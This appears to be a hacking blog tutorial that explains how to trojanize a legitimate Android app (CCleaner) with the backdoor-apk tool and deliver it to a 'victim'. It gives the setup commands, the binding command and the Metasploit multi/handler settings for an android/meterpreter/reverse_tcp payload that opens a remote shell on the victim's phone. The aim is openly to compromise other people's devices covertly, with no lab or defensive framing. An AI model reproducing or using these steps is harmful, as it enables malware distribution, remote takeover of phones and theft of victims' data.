Hack Android Phone using Backdoor Apk

Hack Android Phone using Backdoor Apk

Sometimes in hacking we have to use most genuine way so that victim is surely hacked. These genuine ways are to be used for our advantage. One of the most genuine ways to hack an android phone is to bind original android file to your backdoor-apk. This backdoor-apk is software which helps us to bind original apk file with your virus. Hence, taking all the suspicious away from you.
And for this first you have to execute the following command:
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
https://i1.wp.com/3.bp.blogspot.com/-ZqZqijYLQHs/V-fpffCEa8I/AAAAAAAANu4/8DwG2J_LCdkY5o1i_Xjj2rDctgmWrpQXwCLcB/s1600/1.png?w=687&ssl=1
Once the command is execution and installation is done then downloads the backdoor-apk from github and for that type:
https://i0.wp.com/3.bp.blogspot.com/-hYMwWPcsJAI/V-fpdd3XQAI/AAAAAAAANuw/cJB7opl0Ul89UrIU968I2z5kb4XEfqENwCEw/s1600/2.png?w=687&ssl=1
As the software is downloaded, go to the www.apk4fun.com website and download an original apk file like I downloaded ccleaner. And then copy it in the backdoor-apk folder.
Open it in the terminal and type:
./backdoor-apk.sh ccleaner.apk
As the command runs it will ask you for the payload you want to use and for that select 3 and then it will ask you for lhost and lport and give these respectively.
https://i2.wp.com/3.bp.blogspot.com/-5pxYGih7cYY/V-fpgF3gxlI/AAAAAAAANu8/U-dcnzxxFe8tR192aJJkzOsfshdc7pwCACEw/s1600/3.png?resize=670%2C659&ssl=1
The above commands will bind the file to the original apk file and will save it to backdoor-apk>original>dist folder.
https://i1.wp.com/2.bp.blogspot.com/-tQSYqOrL9vI/V-fpfDr-9KI/AAAAAAAANu0/WdHQqSpV5wgLX4Sjhyr9uwOrDCT9NqiSACEw/s1600/4.png?w=687&ssl=1
Now all you have to do is send the file to the victim as he will install it by clicking on next.
https://i0.wp.com/2.bp.blogspot.com/-N7iFFTYnFZI/V-fpgsHOlXI/AAAAAAAANvA/BwJe7iIL3FI7abPfbaop0M8D2z_5ZaV_QCEw/s1600/5.png?resize=370%2C659&ssl=1
And the click on Install to install the app.
https://i2.wp.com/2.bp.blogspot.com/-YYnL9kYeB5M/V-fpg4baCJI/AAAAAAAANvE/LftA9EQtXi47GKRkTEO-XVQeotIOZNKSgCEw/s1600/6.png?resize=370%2C659&ssl=1
This way the app will be downloaded.
https://i2.wp.com/1.bp.blogspot.com/-Nw-D2crv__4/V-fphNbffqI/AAAAAAAANvI/TO7QMkCB2749W_AHb48bxH0uv0CyPXuWQCEw/s1600/7.png?resize=370%2C659&ssl=1
Before opening the app,open metasploit and type :
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.126
set lport 4444
exploit
After this when you run the app; you will get meterpreter session.
https://i1.wp.com/2.bp.blogspot.com/-1-RnHI5CT4I/V-fphq7zzAI/AAAAAAAANvM/l0DIzD49aesKDMaOJ_RHYWj6FGz84RUcACEw/s1600/8.png?w=687&ssl=1
Hence hacking the victim genuinely...

----------------------------vizz creations-----------------------

Comments

Post a Comment